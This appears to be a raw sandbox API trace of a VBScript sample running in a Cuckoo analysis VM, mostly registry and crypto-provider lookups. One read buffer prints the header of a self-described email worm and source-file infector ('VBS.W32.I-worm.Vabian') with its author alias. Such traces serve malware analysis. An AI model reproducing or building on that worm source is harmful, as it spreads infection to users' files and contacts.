Ordinal => 0 FunctionName => CPDeriveKey FunctionAddress => 0x6800d086 ModuleHandle => 0x68000000 |
SUCCESS | 0x00000000 | |
| 19:40:26,363 | 252 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => CPDestroyKey FunctionAddress => 0x68009460 ModuleHandle => 0x68000000 |
SUCCESS | 0x00000000 | |
| 19:40:26,363 | 252 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => CPSetKeyParam FunctionAddress => 0x68009638 ModuleHandle => 0x68000000 |
SUCCESS | 0x00000000 | |
| 19:40:26,363 | 252 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => CPGetKeyParam FunctionAddress => 0x68009a22 ModuleHandle => 0x68000000 |
SUCCESS | 0x00000000 | |
| 19:40:26,363 | 252 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => CPExportKey FunctionAddress => 0x6800ba24 ModuleHandle => 0x68000000 |
SUCCESS | 0x00000000 | |
| 19:40:26,363 | 252 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => CPImportKey FunctionAddress => 0x6800bf8a ModuleHandle => 0x68000000 |
SUCCESS | 0x00000000 | |
| 19:40:26,363 | 252 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => CPEncrypt FunctionAddress => 0x68006c8e ModuleHandle => 0x68000000 |
SUCCESS | 0x00000000 | |
| 19:40:26,363 | 252 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => CPDecrypt FunctionAddress => 0x68007100 ModuleHandle => 0x68000000 |
SUCCESS | 0x00000000 | |
| 19:40:26,363 | 252 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => CPCreateHash FunctionAddress => 0x680074ba ModuleHandle => 0x68000000 |
SUCCESS | 0x00000000 | |
| 19:40:26,363 | 252 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => CPHashData FunctionAddress => 0x68007e56 ModuleHandle => 0x68000000 |
SUCCESS | 0x00000000 | |
| 19:40:26,363 | 252 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => CPHashSessionKey FunctionAddress => 0x68007fa0 ModuleHandle => 0x68000000 |
SUCCESS | 0x00000000 | |
| 19:40:26,363 | 252 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => CPDestroyHash FunctionAddress => 0x680082d1 ModuleHandle => 0x68000000 |
SUCCESS | 0x00000000 | |
| 19:40:26,363 | 252 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => CPSignHash FunctionAddress => 0x6800da22 ModuleHandle => 0x68000000 |
SUCCESS | 0x00000000 | |
| 19:40:26,363 | 252 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => CPVerifySignature FunctionAddress => 0x6800df0a ModuleHandle => 0x68000000 |
SUCCESS | 0x00000000 | |
| 19:40:26,363 | 252 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => CPGenRandom FunctionAddress => 0x6800d7a7 ModuleHandle => 0x68000000 |
SUCCESS | 0x00000000 | |
| 19:40:26,363 | 252 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => CPGetUserKey FunctionAddress => 0x68009562 ModuleHandle => 0x68000000 |
SUCCESS | 0x00000000 | |
| 19:40:26,363 | 252 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => CPSetProvParam FunctionAddress => 0x68009e6d ModuleHandle => 0x68000000 |
SUCCESS | 0x00000000 | |
| 19:40:26,363 | 252 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => CPGetProvParam FunctionAddress => 0x68009f9c ModuleHandle => 0x68000000 |
SUCCESS | 0x00000000 | |
| 19:40:26,363 | 252 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => CPSetHashParam FunctionAddress => 0x6800a56f ModuleHandle => 0x68000000 |
SUCCESS | 0x00000000 | |
| 19:40:26,363 | 252 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => CPGetHashParam FunctionAddress => 0x6800c891 ModuleHandle => 0x68000000 |
SUCCESS | 0x00000000 | |
| 19:40:26,363 | 252 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => CPDuplicateKey FunctionAddress => 0x6800aaae ModuleHandle => 0x68000000 |
SUCCESS | 0x00000000 | |
| 19:40:26,363 | 252 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => CPDuplicateHash FunctionAddress => 0x6800852e ModuleHandle => 0x68000000 |
SUCCESS | 0x00000000 | |
| 19:40:26,363 | 252 | RegOpenKeyExA |
Handle => 0x00000194 Registry => 0x80000002 SubKey => Software\Microsoft\Cryptography |
SUCCESS | 0x00000000 | |
| 19:40:26,363 | 252 | RegQueryValueExA |
Handle => 0x00000194 DataLength => 37 ValueName => MachineGuid Type => 1 |
SUCCESS | 0x00000000 | |
| 19:40:26,363 | 252 | RegQueryValueExA |
Handle => 0x00000194 Data => b51826f3-5572-4e89-93ff-88d625747e04\x00 ValueName => MachineGuid |
SUCCESS | 0x00000000 | |
| 19:40:26,363 | 252 | RegCloseKey |
Handle => 0x00000194 |
SUCCESS | 0x00000000 | |
| 19:40:26,363 | 252 | RegOpenKeyExA |
Handle => 0x00000000 Registry => 0x80000002 SubKey => Software\Microsoft\Cryptography\Offload |
FAILURE | 0x00000002 | |
| 19:40:26,363 | 252 | RegCloseKey |
Handle => 0x0000018c |
SUCCESS | 0x00000000 | |
| 19:40:26,363 | 252 | RegOpenKeyExW |
Handle => 0x00000194 Registry => 0x80000003 SubKey => S-1-5-21-1960408961-789336058-1343024091-1003 |
SUCCESS | 0x00000000 | |
| 19:40:26,363 | 252 | RegCreateKeyExW |
Handle => 0x00000190 Access => 131097 Registry => 0x00000194 Class => SubKey => Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing |
SUCCESS | 0x00000000 | |
| 19:40:26,363 | 252 | RegCloseKey |
Handle => 0x00000194 |
SUCCESS | 0x00000000 | |
| 19:40:26,363 | 252 | RegQueryValueExW |
Handle => 0x00000190 Data => 146432 ValueName => State |
SUCCESS | 0x00000000 | |
| 19:40:26,363 | 252 | RegCloseKey |
Handle => 0x00000190 |
SUCCESS | 0x00000000 | |
| 19:40:26,363 | 252 | RegOpenKeyExW |
Handle => 0x00000190 Registry => 0x80000003 SubKey => S-1-5-21-1960408961-789336058-1343024091-1003 |
SUCCESS | 0x00000000 | |
| 19:40:26,363 | 252 | RegOpenKeyExW |
Handle => 0x00000194 Registry => 0x00000190 SubKey => Software\Microsoft\Internet Explorer\Security |
SUCCESS | 0x00000000 | |
| 19:40:26,363 | 252 | RegCloseKey |
Handle => 0x00000190 |
SUCCESS | 0x00000000 | |
| 19:40:26,363 | 252 | RegQueryValueExW |
Handle => 0x00000194 Data => Q\x00u\x00e\x00r\x00y\x00\x00\x00 ValueName => Safety Warning Level |
SUCCESS | 0x00000000 | |
| 19:40:26,363 | 252 | RegCloseKey |
Handle => 0x00000194 |
SUCCESS | 0x00000000 | |
| 19:40:26,363 | 252 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x80000002 SubKey => Software\Policies\Microsoft\SystemCertificates\TrustedPublisher\Safer |
FAILURE | 0x00000002 | |
| 19:40:26,363 | 252 | RegOpenKeyExW |
Handle => 0x00000194 Registry => 0x80000003 SubKey => S-1-5-21-1960408961-789336058-1343024091-1003 |
SUCCESS | 0x00000000 | |
| 19:40:26,363 | 252 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x00000194 SubKey => Software\Policies\Microsoft\SystemCertificates\TrustedPublisher\Safer |
FAILURE | 0x00000002 | |
| 19:40:26,363 | 252 | RegCloseKey |
Handle => 0x00000194 |
SUCCESS | 0x00000000 | |
| 19:40:26,363 | 252 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x80000002 SubKey => Software\Microsoft\SystemCertificates\TrustedPublisher\Safer |
FAILURE | 0x00000002 | |
| 19:40:26,363 | 252 | NtCreateSection |
ObjectAttributes => DesiredAccess => 0x000f0005 SectionHandle => 0x00000194 FileHandle => 0x00000174 |
SUCCESS | 0x00000000 | |
| 19:40:26,363 | 252 | ZwMapViewOfSection |
SectionOffset => 0x0013efc0 SectionHandle => 0x00000194 ProcessHandle => 0xffffffff BaseAddress => 0x00f60000 |
SUCCESS | 0x00000000 | |
| 19:40:26,363 | 252 | NtQueryInformationFile |
FileHandle => 0x00000174 FileInformation => \x000\x00\x00\x00\x00\x00\x00\xcc$\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegOpenKeyExA |
Handle => 0x00000194 Registry => 0x80000002 SubKey => Software\Microsoft\Cryptography\OID |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegOpenKeyExA |
Handle => 0x00000190 Registry => 0x00000194 SubKey => EncodingType 0 |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegOpenKeyExA |
Handle => 0x00000000 Registry => 0x00000190 SubKey => CryptSIPDllIsMyFileType |
FAILURE | 0x00000002 | |
| 19:40:26,373 | 252 | RegCloseKey |
Handle => 0x00000190 |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegCloseKey |
Handle => 0x00000194 |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegOpenKeyExA |
Handle => 0x00000194 Registry => 0x80000002 SubKey => Software\Microsoft\Cryptography\OID |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegOpenKeyExA |
Handle => 0x00000190 Registry => 0x00000194 SubKey => EncodingType 0 |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegOpenKeyExA |
Handle => 0x00000198 Registry => 0x00000190 SubKey => CryptSIPDllIsMyFileType2 |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegEnumKeyExA |
Index => 0 Handle => 0x00000198 Name => {000C10F1-0000-0000-C000-000000000046} Class => |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegOpenKeyExA |
Handle => 0x0000019c Registry => 0x00000198 SubKey => {000C10F1-0000-0000-C000-000000000046} |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegQueryInfoKeyW |
MaxClassLength => 0 MaxValueLength => 42 MaxValueNameLength => 8 ValueCount => 2 MaxSubKeyLength => 0 KeyHandle => 0x0000019c SubKeyCount => 0 Class => |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegEnumValueW |
Index => 0 Handle => 0x0000019c Data => M\x00S\x00I\x00S\x00I\x00P\x00.\x00D\x00L\x00L\x00\x00\x00 ValueName => Dll |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegEnumValueW |
Index => 1 Handle => 0x0000019c Data => M\x00s\x00i\x00S\x00I\x00P\x00I\x00s\x00M\x00y\x00T\x00y\x00p\x00e\x00O\x00f\x00F\x00i\x00l\x00e\x00\x00\x00 ValueName => FuncName |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegCloseKey |
Handle => 0x0000019c |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegEnumKeyExA |
Index => 1 Handle => 0x00000198 Name => {06C9E010-38CE-11D4-A2A3-00104BD35090} Class => |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegOpenKeyExA |
Handle => 0x0000019c Registry => 0x00000198 SubKey => {06C9E010-38CE-11D4-A2A3-00104BD35090} |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegQueryInfoKeyW |
MaxClassLength => 0 MaxValueLength => 62 MaxValueNameLength => 8 ValueCount => 2 MaxSubKeyLength => 0 KeyHandle => 0x0000019c SubKeyCount => 0 Class => |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegEnumValueW |
Index => 0 Handle => 0x0000019c Data => C\x00:\x00\\x00W\x00I\x00N\x00D\x00O\x00W\x00S\x00\\x00s\x00y\x00s\x00t\x00e\x00m\x003\x002\x00\\x00w\x00s\x00h\x00e\x00x\x00t\x00.\x00d\x00l\x00l\x00\x00\x00 ValueName => Dll |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegEnumValueW |
Index => 1 Handle => 0x0000019c Data => I\x00s\x00F\x00i\x00l\x00e\x00S\x00u\x00p\x00p\x00o\x00r\x00t\x00e\x00d\x00N\x00a\x00m\x00e\x00\x00\x00 ValueName => FuncName |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegCloseKey |
Handle => 0x0000019c |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegEnumKeyExA |
Index => 2 Handle => 0x00000198 Name => {1629F04E-2799-4DB5-8FE5-ACE10F17EBAB} Class => |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegOpenKeyExA |
Handle => 0x0000019c Registry => 0x00000198 SubKey => {1629F04E-2799-4DB5-8FE5-ACE10F17EBAB} |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegQueryInfoKeyW |
MaxClassLength => 0 MaxValueLength => 62 MaxValueNameLength => 8 ValueCount => 2 MaxSubKeyLength => 0 KeyHandle => 0x0000019c SubKeyCount => 0 Class => |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegEnumValueW |
Index => 0 Handle => 0x0000019c Data => C\x00:\x00\\x00W\x00I\x00N\x00D\x00O\x00W\x00S\x00\\x00s\x00y\x00s\x00t\x00e\x00m\x003\x002\x00\\x00w\x00s\x00h\x00e\x00x\x00t\x00.\x00d\x00l\x00l\x00\x00\x00 ValueName => Dll |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegEnumValueW |
Index => 1 Handle => 0x0000019c Data => I\x00s\x00F\x00i\x00l\x00e\x00S\x00u\x00p\x00p\x00o\x00r\x00t\x00e\x00d\x00N\x00a\x00m\x00e\x00\x00\x00 ValueName => FuncName |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegCloseKey |
Handle => 0x0000019c |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegEnumKeyExA |
Index => 3 Handle => 0x00000198 Name => {1A610570-38CE-11D4-A2A3-00104BD35090} Class => |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegOpenKeyExA |
Handle => 0x0000019c Registry => 0x00000198 SubKey => {1A610570-38CE-11D4-A2A3-00104BD35090} |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegQueryInfoKeyW |
MaxClassLength => 0 MaxValueLength => 62 MaxValueNameLength => 8 ValueCount => 2 MaxSubKeyLength => 0 KeyHandle => 0x0000019c SubKeyCount => 0 Class => |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegEnumValueW |
Index => 0 Handle => 0x0000019c Data => C\x00:\x00\\x00W\x00I\x00N\x00D\x00O\x00W\x00S\x00\\x00s\x00y\x00s\x00t\x00e\x00m\x003\x002\x00\\x00w\x00s\x00h\x00e\x00x\x00t\x00.\x00d\x00l\x00l\x00\x00\x00 ValueName => Dll |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegEnumValueW |
Index => 1 Handle => 0x0000019c Data => I\x00s\x00F\x00i\x00l\x00e\x00S\x00u\x00p\x00p\x00o\x00r\x00t\x00e\x00d\x00N\x00a\x00m\x00e\x00\x00\x00 ValueName => FuncName |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegCloseKey |
Handle => 0x0000019c |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegEnumKeyExA |
Index => 4 Handle => 0x00000198 Name => {1A610570-38CE-11D4-A2A3-00104BD35090} Class => |
FAILURE | 0x00000103 | |
| 19:40:26,373 | 252 | RegCloseKey |
Handle => 0x00000198 |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegCloseKey |
Handle => 0x00000190 |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegCloseKey |
Handle => 0x00000194 |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegOpenKeyExA |
Handle => 0x00000194 Registry => 0x80000002 SubKey => Software\Microsoft\Cryptography\OID |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegEnumKeyExA |
Index => 0 Handle => 0x00000194 Name => EncodingType 0 Class => |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegOpenKeyExA |
Handle => 0x00000190 Registry => 0x00000194 SubKey => EncodingType 0 |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegOpenKeyExA |
Handle => 0x00000198 Registry => 0x00000190 SubKey => CryptSIPDllIsMyFileType2 |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegEnumKeyExA |
Index => 0 Handle => 0x00000198 Name => {000C10F1-0000-0000-C000-000000000046} Class => |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegOpenKeyExA |
Handle => 0x0000019c Registry => 0x00000198 SubKey => {000C10F1-0000-0000-C000-000000000046} |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegQueryInfoKeyW |
MaxClassLength => 0 MaxValueLength => 42 MaxValueNameLength => 8 ValueCount => 2 MaxSubKeyLength => 0 KeyHandle => 0x0000019c SubKeyCount => 0 Class => |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegEnumValueW |
Index => 0 Handle => 0x0000019c Data => M\x00S\x00I\x00S\x00I\x00P\x00.\x00D\x00L\x00L\x00\x00\x00 ValueName => Dll |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegEnumValueW |
Index => 1 Handle => 0x0000019c Data => M\x00s\x00i\x00S\x00I\x00P\x00I\x00s\x00M\x00y\x00T\x00y\x00p\x00e\x00O\x00f\x00F\x00i\x00l\x00e\x00\x00\x00 ValueName => FuncName |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegCloseKey |
Handle => 0x0000019c |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegEnumKeyExA |
Index => 1 Handle => 0x00000198 Name => {06C9E010-38CE-11D4-A2A3-00104BD35090} Class => |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegOpenKeyExA |
Handle => 0x0000019c Registry => 0x00000198 SubKey => {06C9E010-38CE-11D4-A2A3-00104BD35090} |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegQueryInfoKeyW |
MaxClassLength => 0 MaxValueLength => 62 MaxValueNameLength => 8 ValueCount => 2 MaxSubKeyLength => 0 KeyHandle => 0x0000019c SubKeyCount => 0 Class => |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegEnumValueW |
Index => 0 Handle => 0x0000019c Data => C\x00:\x00\\x00W\x00I\x00N\x00D\x00O\x00W\x00S\x00\\x00s\x00y\x00s\x00t\x00e\x00m\x003\x002\x00\\x00w\x00s\x00h\x00e\x00x\x00t\x00.\x00d\x00l\x00l\x00\x00\x00 ValueName => Dll |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegEnumValueW |
Index => 1 Handle => 0x0000019c Data => I\x00s\x00F\x00i\x00l\x00e\x00S\x00u\x00p\x00p\x00o\x00r\x00t\x00e\x00d\x00N\x00a\x00m\x00e\x00\x00\x00 ValueName => FuncName |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegCloseKey |
Handle => 0x0000019c |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegEnumKeyExA |
Index => 2 Handle => 0x00000198 Name => {1629F04E-2799-4DB5-8FE5-ACE10F17EBAB} Class => |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegOpenKeyExA |
Handle => 0x0000019c Registry => 0x00000198 SubKey => {1629F04E-2799-4DB5-8FE5-ACE10F17EBAB} |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegQueryInfoKeyW |
MaxClassLength => 0 MaxValueLength => 62 MaxValueNameLength => 8 ValueCount => 2 MaxSubKeyLength => 0 KeyHandle => 0x0000019c SubKeyCount => 0 Class => |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegEnumValueW |
Index => 0 Handle => 0x0000019c Data => C\x00:\x00\\x00W\x00I\x00N\x00D\x00O\x00W\x00S\x00\\x00s\x00y\x00s\x00t\x00e\x00m\x003\x002\x00\\x00w\x00s\x00h\x00e\x00x\x00t\x00.\x00d\x00l\x00l\x00\x00\x00 ValueName => Dll |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegEnumValueW |
Index => 1 Handle => 0x0000019c Data => I\x00s\x00F\x00i\x00l\x00e\x00S\x00u\x00p\x00p\x00o\x00r\x00t\x00e\x00d\x00N\x00a\x00m\x00e\x00\x00\x00 ValueName => FuncName |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegCloseKey |
Handle => 0x0000019c |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegEnumKeyExA |
Index => 3 Handle => 0x00000198 Name => {1A610570-38CE-11D4-A2A3-00104BD35090} Class => |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegOpenKeyExA |
Handle => 0x0000019c Registry => 0x00000198 SubKey => {1A610570-38CE-11D4-A2A3-00104BD35090} |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegQueryInfoKeyW |
MaxClassLength => 0 MaxValueLength => 62 MaxValueNameLength => 8 ValueCount => 2 MaxSubKeyLength => 0 KeyHandle => 0x0000019c SubKeyCount => 0 Class => |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegEnumValueW |
Index => 0 Handle => 0x0000019c Data => C\x00:\x00\\x00W\x00I\x00N\x00D\x00O\x00W\x00S\x00\\x00s\x00y\x00s\x00t\x00e\x00m\x003\x002\x00\\x00w\x00s\x00h\x00e\x00x\x00t\x00.\x00d\x00l\x00l\x00\x00\x00 ValueName => Dll |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegEnumValueW |
Index => 1 Handle => 0x0000019c Data => I\x00s\x00F\x00i\x00l\x00e\x00S\x00u\x00p\x00p\x00o\x00r\x00t\x00e\x00d\x00N\x00a\x00m\x00e\x00\x00\x00 ValueName => FuncName |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegCloseKey |
Handle => 0x0000019c |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegEnumKeyExA |
Index => 4 Handle => 0x00000198 Name => {1A610570-38CE-11D4-A2A3-00104BD35090} Class => |
FAILURE | 0x00000103 | |
| 19:40:26,373 | 252 | RegCloseKey |
Handle => 0x00000198 |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegCloseKey |
Handle => 0x00000190 |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegEnumKeyExA |
Index => 1 Handle => 0x00000194 Name => EncodingType 1 Class => |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegOpenKeyExA |
Handle => 0x00000190 Registry => 0x00000194 SubKey => EncodingType 1 |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegOpenKeyExA |
Handle => 0x00000000 Registry => 0x00000190 SubKey => CryptSIPDllIsMyFileType2 |
FAILURE | 0x00000002 | |
| 19:40:26,373 | 252 | RegCloseKey |
Handle => 0x00000190 |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegEnumKeyExA |
Index => 2 Handle => 0x00000194 Name => EncodingType 1 Class => |
FAILURE | 0x00000103 | |
| 19:40:26,373 | 252 | RegCloseKey |
Handle => 0x00000194 |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | LdrLoadDll |
Flags => 1306320 BaseAddress => 0x605f0000 FileName => MSISIP.DLL |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => DllCanUnloadNow FunctionAddress => 0x77a89f6c ModuleHandle => 0x605f0000 |
FAILURE | 0xc0000139 | |
| 19:40:26,373 | 252 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => MsiSIPIsMyTypeOfFile FunctionAddress => 0x605f1da1 ModuleHandle => 0x605f0000 |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | LdrLoadDll |
Flags => 1306320 BaseAddress => 0x774e0000 FileName => ole32.dll |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => CoInitialize FunctionAddress => 0x77502a53 ModuleHandle => 0x774e0000 |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => StgOpenStorage FunctionAddress => 0x77507394 ModuleHandle => 0x774e0000 |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | NtCreateSection |
ObjectAttributes => C:\DfSharedHeap22F83 DesiredAccess => 0x000f0007 SectionHandle => 0x00000190 FileHandle => 0x00000000 |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | ZwMapViewOfSection |
SectionOffset => 0x0013e9a8 SectionHandle => 0x00000190 ProcessHandle => 0xffffffff BaseAddress => 0x01130000 |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | NtCreateFile |
ShareAccess => 1 FileName => C:\Documents and Settings\cuckoo\Local Settings\Temp\dboardman3_malware2.vbs DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x00000194 |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | NtQueryInformationFile |
FileHandle => 0x00000194 FileInformation => \x000\x00\x00\x00\x00\x00\x00\xcc$\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | NtCreateSection |
ObjectAttributes => C:\DFMap0-143244 DesiredAccess => 0x000f0005 SectionHandle => 0x00000198 FileHandle => 0x00000194 |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | NtQueryInformationFile |
FileHandle => 0x00000194 FileInformation => \x000\x00\x00\x00\x00\x00\x00\xcc$\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | ZwMapViewOfSection |
SectionOffset => 0x0013e2d4 SectionHandle => 0x00000198 ProcessHandle => 0xffffffff BaseAddress => 0x00f60000 |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\cuckoo\Local Settings\Temp\dboardman3_malware2.vbs DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x00000194 |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | NtReadFile |
Buffer => Rem VBS.W32.I-worm.Vabian
Rem Script Project Infector [pas,frm,cpp]
Rem By Psychologic aka Puppy
Rem Mailto : Psychologic@hotmail.com
'sending filename
'x=msgbox(Wscript.ScriptName, 0, "Title")
'malware expires....
date2 = #06/01/2018#
date1 =
FileHandle => 0x00000194 |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => CoUninitialize FunctionAddress => 0x774fee46 ModuleHandle => 0x774e0000 |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | LdrLoadDll |
Flags => 1305876 BaseAddress => 0x77a80000 FileName => C:\WINDOWS\system32\CRYPT32.dll |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | CreateThread |
ThreadId => 412 StartRoutine => 0x77a8964d Parameter => 0x00194650 CreationFlags => 0 |
SUCCESS | 0x00000198 | |
| 19:40:26,373 | 252 | LdrLoadDll |
Flags => 1306320 BaseAddress => 0x7dfa0000 FileName => C:\WINDOWS\system32\wshext.dll |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => DllCanUnloadNow FunctionAddress => 0x7dfa17cc ModuleHandle => 0x7dfa0000 |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => IsFileSupportedName FunctionAddress => 0x7dfa17fd ModuleHandle => 0x7dfa0000 |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegOpenKeyExA |
Handle => 0x0000019c Registry => 0x80000002 SubKey => Software\Microsoft\Cryptography\OID |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegEnumKeyExA |
Index => 0 Handle => 0x0000019c Name => EncodingType 0 Class => |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegOpenKeyExA |
Handle => 0x000001a0 Registry => 0x0000019c SubKey => EncodingType 0 |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegOpenKeyExA |
Handle => 0x000001a4 Registry => 0x000001a0 SubKey => CryptSIPDllPutSignedDataMsg |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegEnumKeyExA |
Index => 0 Handle => 0x000001a4 Name => {000C10F1-0000-0000-C000-000000000046} Class => |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegOpenKeyExA |
Handle => 0x000001a8 Registry => 0x000001a4 SubKey => {000C10F1-0000-0000-C000-000000000046} |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegQueryInfoKeyW |
MaxClassLength => 0 MaxValueLength => 46 MaxValueNameLength => 8 ValueCount => 2 MaxSubKeyLength => 0 KeyHandle => 0x000001a8 SubKeyCount => 0 Class => |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegEnumValueW |
Index => 0 Handle => 0x000001a8 Data => M\x00S\x00I\x00S\x00I\x00P\x00.\x00D\x00L\x00L\x00\x00\x00 ValueName => Dll |
SUCCESS | 0x00000000 | |
